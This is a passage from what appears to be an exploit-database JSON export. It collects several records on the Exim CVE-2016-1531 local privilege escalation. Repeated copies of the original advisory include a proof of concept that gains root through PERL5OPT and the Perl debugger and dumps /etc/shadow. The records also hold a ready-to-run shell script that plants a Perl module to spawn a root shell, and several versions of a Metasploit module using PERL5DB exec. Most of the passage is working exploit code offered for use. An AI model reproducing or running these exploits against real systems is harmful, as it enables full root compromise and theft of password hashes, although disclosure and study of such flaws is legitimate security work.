Exim is quite different.\"\r\n \r\nhttp://www.exim.org/\r\n \r\n \r\nIII. 
INTRODUCTION\r\n-------------------------\r\n \r\nWhen an Exim installation has been compiled with Perl support and contains a \r\nperl_startup configuration variable it can be exploited by malicious local \r\nattackers to gain root privileges.\r\n \r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\nThe vulnerability stems from Exim in versions below 4.86.2 not performing \r\nsanitization of the environment before loading a perl script defined\r\nwith perl_startup setting in exim config.\r\n \r\nperl_startup is usually used to load various helper scripts such as\r\nmail filters, gray listing scripts, mail virus scanners etc.\r\n \r\nFor the option to be supported, exim must have been compiled with Perl \r\nsupport, which can be verified with:\r\n \r\n[dawid@centos7 ~]$ exim -bV -v | grep -i Perl\r\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL\r\nContent_Scanning DKIM Old_Demime PRDR OCSP\r\n \r\n \r\nTo perform the attack, attacker can take advantage of the exim's sendmail \r\ninterface which links to an exim binary that has an SUID bit set on it by \r\ndefault as we can see below:\r\n \r\n[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim \r\nlrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim\r\n \r\n[dawid@centos7 ~]$ ls -l /usr/sbin/exim\r\n-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim\r\n \r\n \r\nNormally, when exim sendmail interface starts up, it drops its root\r\nprivileges before giving control to the user (i.e entering mail contents for\r\nsending etc), however an attacker can make use of the following command line \r\nparameter which is available to all users:\r\n \r\n-ps This option applies when an embedded Perl interpreter is linked with \r\n Exim. 
It overrides the setting of the perl_at_start option, forcing the \r\n starting of the interpreter to occur as soon as Exim is started.\r\n \r\n \r\nAs we can see from the documentation at:\r\n \r\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\r\n \r\nthe perl_at_start option does the following:\r\n \r\n\"Setting perl_at_start (a boolean option) in the configuration requests a \r\nstartup when Exim is entered.\"\r\n \r\nTherefore it is possible to force the execution of the perl_startup script\r\ndefined in the Exim's main config before exim drops its root privileges.\r\n \r\n \r\nTo exploit this setting and gain the effective root privilege of the SUID binary,\r\nattackers can inject PERL5OPT perl environment variable, which does not get\r\ncleaned by affected versions of Exim.\r\n \r\nAs per perl documentation, the environment variable allows to set perl command-line \r\noptions (switches). Switches in this variable are treated as if they were on every\r\nPerl command line. \r\n \r\nThere are several interesting perl switches that that could be set by attackers to \r\ntrigger code execution. \r\nOne of these is -d switch which forces perl to enter an interactive debug mode \r\nin which it is possible to take control of the perl application.\r\n \r\nAn example proof of concept exploit using the -d switch can be found below.\r\n \r\n \r\nV. 
PROOF OF CONCEPT ROOT EXPLOIT\r\n-------------------------\r\n \r\n[[email\u00a0protected] ~]$ head /etc/exim/exim.conf \r\n######################################################################\r\n# Runtime configuration file for Exim #\r\n######################################################################\r\n \r\n# Custom filtering via perl\r\nperl_startup = do '/usr/share/exim4/exigrey.pl'\r\n \r\n[[email\u00a0protected] ~]$ exim -bV -v | grep -i Perl\r\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP\r\n \r\n[[email\u00a0protected] ~]$ PERL5OPT=\"-d/dev/null\" /usr/sbin/sendmail.exim -ps [email\u00a0protected]\r\n \r\nLoading DB routines from perl5db.pl version 1.37\r\nEditor support available.\r\n \r\nEnter h or 'h h' for help, or 'man perldebug' for more help.\r\n \r\nDebugged program terminated. Use q to quit or R to restart,\r\n use o inhibit_exit to avoid stopping after program termination,\r\n h q, h R or h o to get additional info. \r\n \r\n DB<1> p system(\"id\");\r\nuid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n0\r\n DB<2> p system(\"head /etc/shadow\");\r\nroot:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::\r\nbin:*:16372:0:99999:7:::\r\ndaemon:*:16372:0:99999:7::\r\n[...]\r\n \r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nThis vulnerability could be exploited by attackers who have local access to the\r\nsystem to escalate their privileges to root which would allow them to fully\r\ncompromise the system.\r\n \r\nVII. 
SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nExim versions before the latest patched version of Exim 4.86.2 are affected by \r\nthis vulnerability, if Exim was compiled with Perl support and the main \r\nconfiguration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains \r\na perl_startup option e.g:\r\n \r\nperl_startup = do '/usr/share/exim4/exigrey.pl'\r\n \r\nIt is important to note that the file does not necessarily have to exist\r\nto exploit the vulnerability. Although the path must be specified.\r\n \r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nUpdate to Exim 4.86.2 which contains the official patch that fixes the\r\nenvironment sanitization issues.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n \r\nhttp://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt\r\nhttp://www.exim.org/\r\nhttp://www.exim.org/static/doc/CVE-2016-1531.txt\r\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\r\nhttps://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f\r\n \r\nCVE-2016-1531\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531\r\n \r\nX. ADVISORY CREATED BY\r\n-------------------------\r\n \r\nThis advisory has been created by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n \r\nMarch 10th, 2016: Advisory released\r\nMarch 11th, 2016: Fixed advisory header,added cve.mitre link of the root issue\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n \r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. 
I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\n\n# 0day.today [2018-03-10] #", "sourceHref": "https://0day.today/exploit/25544", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-19T23:32:21", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2016-03-09T00:00:00", "type": "zdt", "title": "Exim 4.84-3 - Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-09T00:00:00", "id": "1337DAY-ID-25543", "href": "https://0day.today/exploit/description/25543", "sourceData": "#!/bin/sh\r\n# CVE-2016-1531 exim <= 4.84-3 local root exploit\r\n# ===============================================\r\n# you can write files as root or force a perl module to\r\n# load by manipulating the perl environment and running\r\n# exim with the \"perl_startup\" arguement -ps. \r\n#\r\n# e.g.\r\n# [[email\u00a0protected] tmp]$ ./cve-2016-1531.sh \r\n# [ CVE-2016-1531 local root exploit\r\n# sh-4.3# id\r\n# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)\r\n# \r\n# -- Hacker Fantastic \r\necho [ CVE-2016-1531 local root exploit\r\ncat > /tmp/root.pm << EOF\r\npackage root;\r\nuse strict;\r\nuse warnings;\r\n \r\nsystem(\"/bin/sh\");\r\nEOF\r\nPERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/25543", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-19T02:01:44", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2016-04-15T00:00:00", "type": "zdt", "title": "Exim - 'perl_startup' Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-04-15T00:00:00", "id": "1337DAY-ID-25565", "href": 
"https://0day.today/exploit/description/25565", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Local\r\n \r\n Rank = ExcellentRanking\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim \"perl_startup\" Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a Perl injection vulnerability in Exim < 4.86.2\r\n given the presence of the \"perl_startup\" configuration parameter.\r\n },\r\n 'Author' => [\r\n 'Dawid Golunski', # Vulnerability discovery\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n %w{CVE 2016-1531},\r\n %w{EDB 39549},\r\n %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}\r\n ],\r\n 'DisclosureDate' => 'Mar 10 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'SessionTypes' => %w{shell meterpreter},\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'BadChars' => \"\\x22\\x27\", # \" and '\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd cmd_bash',\r\n 'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Exim < 4.86.2', {}]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n \r\n def check\r\n if exploit('whoami') == 'root'\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit(c = payload.encoded)\r\n # PERL5DB technique from http://perldoc.perl.org/perlrun.html\r\n cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec \"#{c}\"' exim -ps 2>&-})\r\n end\r\n \r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/25565", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:29", "description": "", "cvss3": {}, "published": "2016-03-08T00:00:00", "type": "packetstorm", "title": "Exim 4.84-3 Local Root / Privilege 
Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-08T00:00:00", "id": "PACKETSTORM:136124", "href": "https://packetstormsecurity.com/files/136124/Exim-4.84-3-Local-Root-Privilege-Escalation.html", "sourceData": "`#!/bin/sh \n# CVE-2016-1531 exim <= 4.84-3 local root exploit \n# =============================================== \n# you can write files as root or force a perl module to \n# load by manipulating the perl environment and running \n# exim with the \"perl_startup\" arguement -ps. \n# \n# e.g. \n# [fantastic@localhost tmp]$ ./cve-2016-1531.sh \n# [ CVE-2016-1531 local root exploit \n# sh-4.3# id \n# uid=0(root) gid=1000(fantastic) groups=1000(fantastic) \n# \n# -- Hacker Fantastic \necho [ CVE-2016-1531 local root exploit \ncat > /tmp/root.pm << EOF \npackage root; \nuse strict; \nuse warnings; \n \nsystem(\"/bin/sh\"); \nEOF \nPERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/136124/exim-escalate.txt", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:22:05", "description": "", "cvss3": {}, "published": "2016-03-10T00:00:00", "type": "packetstorm", "title": "Exim Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-10T00:00:00", "id": "PACKETSTORM:136165", "href": "https://packetstormsecurity.com/files/136165/Exim-Local-Privilege-Escalation.html", "sourceData": "`============================================= \n- Advisory release date: 10.03.2016 \n- Created by: Dawid Golunski \n- Severity: High/Critical \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nExim < 4.86.2 Local Root Privilege Escalation Exploit \n \n \nII. 
BACKGROUND \n------------------------- \n \n\"Exim is a message transfer agent (MTA) developed at the University of \nCambridge for use on Unix systems connected to the Internet. It is freely \navailable under the terms of the GNU General Public Licence. In style it is \nsimilar to Smail 3, but its facilities are more general. There is a great \ndeal of flexibility in the way mail can be routed, and there are extensive \nfacilities for checking incoming mail. Exim can be installed in place of \nSendmail, although the configuration of Exim is quite different.\" \n \nhttp://www.exim.org/ \n \n \nIII. INTRODUCTION \n------------------------- \n \nWhen Exim installation has been compiled with Perl support and contains a \nperl_startup configuration variable it can be exploited by malicious local \nattackers to gain root privileges. \n \nIV. DESCRIPTION \n------------------------- \n \nThe vulnerability stems from Exim in versions below 4.86.2 not performing \nsanitization of the environment before loading a perl script defined \nwith perl_startup setting in exim config. \n \nperl_startup is usually used to load various helper scripts such as \nmail filters, gray listing scripts, mail virus scanners etc. \n \nFor the option to be supported, exim must have been compiled with Perl \nsupport, which can be verified with: \n \n[dawid@centos7 ~]$ exim -bV -v | grep i Perl \nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL \nContent_Scanning DKIM Old_Demime PRDR OCSP \n \n \nTo perform the attack, attacker can take advantage of the exim's sendmail \ninterface which links to an exim binary that has an SUID bit set on it by \ndefault as we can see below: \n \n[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim \nlrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim \n \n[dawid@centos7 ~]$ ls -l /usr/sbin/exim \n-rwsr-xr-x. 
1 root root 1222416 Dec 7 2015 /usr/sbin/exim \n \n \nNormally, when exim sendmail interface starts up, it drops its root \nprivileges before giving control to the user (i.e entering mail contents for \nsending etc), however an attacker can make use of the following command line \nparameter which is available to all users: \n \n-ps This option applies when an embedded Perl interpreter is linked with \nExim. It overrides the setting of the perl_at_start option, forcing the \nstarting of the interpreter to occur as soon as Exim is started. \n \n \nAs we can see from the documentation at: \n \nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html \n \nthe perl_at_start option does the following: \n \n\"Setting perl_at_start (a boolean option) in the configuration requests a \nstartup when Exim is entered.\" \n \nTherefore it is possible to force the execution of the perl_startup script \ndefined in the Exim's main config before exim drops its root privileges. \n \n \nTo exploit this setting and gain the effective root privilege of the SUID binary, \nattackers can inject PERL5OPT perl environment variable, which does not get \ncleaned by affected versions of Exim. \n \nAs per perl documentation, the environment variable allows to set perl command-line \noptions (switches). Switches in this variable are treated as if they were on every \nPerl command line. \n \nThere are several interesting perl switches that that could be set by attackers to \ntrigger code execution. \nOne of these is -d switch which forces perl to enter an interactive debug mode \nin which it is possible to take control of the perl application. \n \nAn example proof of concept exploit using the -d switch can be found below. \n \n \nV. 
PROOF OF CONCEPT ROOT EXPLOIT \n------------------------- \n \n[dawid@centos7 ~]$ head /etc/exim/exim.conf \n###################################################################### \n# Runtime configuration file for Exim # \n###################################################################### \n \n# Custom filtering via perl \nperl_startup = do '/usr/share/exim4/exigrey.pl' \n \n[dawid@centos7 ~]$ exim -bV -v | grep -i Perl \nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP \n \n[dawid@centos7 ~]$ PERL5OPT=\"-d/dev/null\" /usr/sbin/sendmail.exim -ps victim@localhost \n \nLoading DB routines from perl5db.pl version 1.37 \nEditor support available. \n \nEnter h or 'h h' for help, or 'man perldebug' for more help. \n \nDebugged program terminated. Use q to quit or R to restart, \nuse o inhibit_exit to avoid stopping after program termination, \nh q, h R or h o to get additional info. \n \nDB<1> p system(\"id\"); \nuid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 \n0 \nDB<2> p system(\"head /etc/shadow\"); \nroot:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7::: \nbin:*:16372:0:99999:7::: \ndaemon:*:16372:0:99999:7:: \n[...] \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nThis vulnerability could be exploited by attackers who have local access to the \nsystem to escalate their privileges to root which would allow them to fully \ncompromise the system. \n \nVII. 
SYSTEMS AFFECTED \n------------------------- \n \nExim versions before the latest patched version of Exim 4.86.2 are affected by \nthis vulnerability, if Exim was compiled with Perl support and the main \nconfiguration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains \na perl_startup option e.g: \n \nperl_startup = do '/usr/share/exim4/exigrey.pl' \n \nIt is important to note that the file does not necessarily have to exist \nto exploit the vulnerability. Although the path must be specified. \n \n \nVIII. SOLUTION \n------------------------- \n \nUpdate to Exim 4.86.2 which contains the official patch that fixes the \nenvironment sanitization issues. \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt \nhttp://www.exim.org/ \nhttp://www.exim.org/static/doc/CVE-2016-1531.txt \nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html \nhttps://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f \n \nCVE-2016-1531 \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531 \n \nX. ADVISORY CREATED BY \n------------------------- \n \nThis advisory has been created by Dawid Golunski \ndawid (at) legalhackers (dot) com \nlegalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \nMarch 10th, 2016: Advisory released \nMarch 11th, 2016: Fixed advisory header,added cve.mitre link of the root issue \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. 
\n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/136165/Exim-Local-Root-Privilege-Escalation.txt", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:17", "description": "", "cvss3": {}, "published": "2016-04-14T00:00:00", "type": "packetstorm", "title": "Exim perl_startup Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-04-14T00:00:00", "id": "PACKETSTORM:136694", "href": "https://packetstormsecurity.com/files/136694/Exim-perl_startup-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \n \nRank = ExcellentRanking \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exim \"perl_startup\" Privilege Escalation', \n'Description' => %q{ \nThis module exploits a Perl injection vulnerability in Exim < 4.86.2 \ngiven the presence of the \"perl_startup\" configuration parameter. 
\n}, \n'Author' => [ \n'Dawid Golunski', # Vulnerability discovery \n'wvu' # Metasploit module \n], \n'References' => [ \n%w{CVE 2016-1531}, \n%w{EDB 39549}, \n%w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt} \n], \n'DisclosureDate' => 'Mar 10 2016', \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'SessionTypes' => %w{shell meterpreter}, \n'Privileged' => true, \n'Payload' => { \n'BadChars' => \"\\x22\\x27\", # \" and ' \n'Compat' => { \n'PayloadType' => 'cmd cmd_bash', \n'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet' \n} \n}, \n'Targets' => [ \n['Exim < 4.86.2', {}] \n], \n'DefaultTarget' => 0 \n)) \nend \n \ndef check \nif exploit('whoami') == 'root' \nCheckCode::Vulnerable \nelse \nCheckCode::Safe \nend \nend \n \ndef exploit(c = payload.encoded) \n# PERL5DB technique from http://perldoc.perl.org/perlrun.html \ncmd_exec(%Q{PERL5OPT=-d PERL5DB='exec \"#{c}\"' exim -ps 2>&-}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/136694/exim_perl_startup.rb.txt", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2023-02-09T10:08:07", "description": "This module exploits a Perl injection vulnerability in Exim < 4.86.2 given the presence of the \"perl_startup\" configuration parameter.\n", "cvss3": {}, "published": "2016-04-13T22:51:20", "type": "metasploit", "title": "Exim \"perl_startup\" Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2023-02-05T04:45:30", "id": "MSF:EXPLOIT-UNIX-LOCAL-EXIM_PERL_STARTUP-", "href": "https://www.rapid7.com/db/modules/exploit/unix/local/exim_perl_startup/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n def initialize(info = {})\n 
super(\n update_info(\n info,\n 'Name' => 'Exim \"perl_startup\" Privilege Escalation',\n 'Description' => %q{\n This module exploits a Perl injection vulnerability in Exim < 4.86.2\n given the presence of the \"perl_startup\" configuration parameter.\n },\n 'Author' => [\n 'Dawid Golunski', # Vulnerability discovery\n 'wvu' # Metasploit module\n ],\n 'References' => [\n %w[CVE 2016-1531],\n %w[EDB 39549],\n %w[URL http://www.exim.org/static/doc/CVE-2016-1531.txt]\n ],\n 'DisclosureDate' => '2016-03-10',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'SessionTypes' => %w[shell meterpreter],\n 'Privileged' => true,\n 'Payload' => {\n 'BadChars' => \"\\x22\\x27\" # \" and '\n },\n 'Targets' => [\n ['Exim < 4.86.2', {}]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [REPEATABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => []\n }\n )\n )\n end\n\n def check\n if exploit('whoami') == 'root'\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n end\n\n def exploit(cmd = payload.encoded)\n # PERL5DB technique from http://perldoc.perl.org/perlrun.html\n cmd_exec(%(PERL5OPT=-d PERL5DB='exec \"#{cmd}\"' exim -ps 2>&-))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/local/exim_perl_startup.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2023-12-06T15:58:18", "description": "", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-10T00:00:00", "type": "exploitdb", "title": "Exim < 4.86.2 - Local Privilege Escalation", "bulletinFamily": 
"exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-1531", "CVE-2016-1531"], "modified": "2016-03-10T00:00:00", "id": "EDB-ID:39549", "href": "https://www.exploit-db.com/exploits/39549", "sourceData": "=============================================\r\n- Advisory release date: 10.03.2016\r\n- Created by: Dawid Golunski\r\n- Severity: High/Critical\r\n=============================================\r\n\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nExim < 4.86.2 Local Root Privilege Escalation Exploit\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"Exim is a message transfer agent (MTA) developed at the University of \r\nCambridge for use on Unix systems connected to the Internet. It is freely \r\navailable under the terms of the GNU General Public Licence. In style it is \r\nsimilar to Smail 3, but its facilities are more general. There is a great \r\ndeal of flexibility in the way mail can be routed, and there are extensive \r\nfacilities for checking incoming mail. Exim can be installed in place of \r\nSendmail, although the configuration of Exim is quite different.\"\r\n\r\nhttp://www.exim.org/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nWhen Exim installation has been compiled with Perl support and contains a \r\nperl_startup configuration variable it can be exploited by malicious local \r\nattackers to gain root privileges.\r\n\r\nIV. 
DESCRIPTION\r\n-------------------------\r\n\r\nThe vulnerability stems from Exim in versions below 4.86.2 not performing \r\nsanitization of the environment before loading a perl script defined\r\nwith perl_startup setting in exim config.\r\n\r\nperl_startup is usually used to load various helper scripts such as\r\nmail filters, gray listing scripts, mail virus scanners etc.\r\n\r\nFor the option to be supported, exim must have been compiled with Perl \r\nsupport, which can be verified with:\r\n\r\n[dawid@centos7 ~]$ exim -bV -v | grep i Perl\r\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL\r\nContent_Scanning DKIM Old_Demime PRDR OCSP\r\n\r\n\r\nTo perform the attack, attacker can take advantage of the exim's sendmail \r\ninterface which links to an exim binary that has an SUID bit set on it by \r\ndefault as we can see below:\r\n\r\n[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim \r\nlrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim\r\n\r\n[dawid@centos7 ~]$ ls -l /usr/sbin/exim\r\n-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim\r\n\r\n\r\nNormally, when exim sendmail interface starts up, it drops its root\r\nprivileges before giving control to the user (i.e entering mail contents for\r\nsending etc), however an attacker can make use of the following command line \r\nparameter which is available to all users:\r\n\r\n-ps This option applies when an embedded Perl interpreter is linked with \r\n Exim. 
It overrides the setting of the perl_at_start option, forcing the \r\n starting of the interpreter to occur as soon as Exim is started.\r\n\r\n\r\nAs we can see from the documentation at:\r\n\r\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\r\n\r\nthe perl_at_start option does the following:\r\n\r\n\"Setting perl_at_start (a boolean option) in the configuration requests a \r\nstartup when Exim is entered.\"\r\n\r\nTherefore it is possible to force the execution of the perl_startup script\r\ndefined in the Exim's main config before exim drops its root privileges.\r\n\r\n\r\nTo exploit this setting and gain the effective root privilege of the SUID binary,\r\nattackers can inject PERL5OPT perl environment variable, which does not get\r\ncleaned by affected versions of Exim.\r\n\r\nAs per perl documentation, the environment variable allows to set perl command-line \r\noptions (switches). Switches in this variable are treated as if they were on every\r\nPerl command line. \r\n\r\nThere are several interesting perl switches that that could be set by attackers to \r\ntrigger code execution. \r\nOne of these is -d switch which forces perl to enter an interactive debug mode \r\nin which it is possible to take control of the perl application.\r\n\r\nAn example proof of concept exploit using the -d switch can be found below.\r\n\r\n\r\nV. 
PROOF OF CONCEPT ROOT EXPLOIT\r\n-------------------------\r\n\r\n[dawid@centos7 ~]$ head /etc/exim/exim.conf \r\n######################################################################\r\n# Runtime configuration file for Exim #\r\n######################################################################\r\n\r\n# Custom filtering via perl\r\nperl_startup = do '/usr/share/exim4/exigrey.pl'\r\n\r\n[dawid@centos7 ~]$ exim -bV -v | grep -i Perl\r\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP\r\n\r\n[dawid@centos7 ~]$ PERL5OPT=\"-d/dev/null\" /usr/sbin/sendmail.exim -ps victim@localhost\r\n\r\nLoading DB routines from perl5db.pl version 1.37\r\nEditor support available.\r\n\r\nEnter h or 'h h' for help, or 'man perldebug' for more help.\r\n\r\nDebugged program terminated. Use q to quit or R to restart,\r\n use o inhibit_exit to avoid stopping after program termination,\r\n h q, h R or h o to get additional info. \r\n\r\n DB<1> p system(\"id\");\r\nuid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n0\r\n DB<2> p system(\"head /etc/shadow\");\r\nroot:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::\r\nbin:*:16372:0:99999:7:::\r\ndaemon:*:16372:0:99999:7::\r\n[...]\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nThis vulnerability could be exploited by attackers who have local access to the\r\nsystem to escalate their privileges to root which would allow them to fully\r\ncompromise the system.\r\n\r\nVII. 
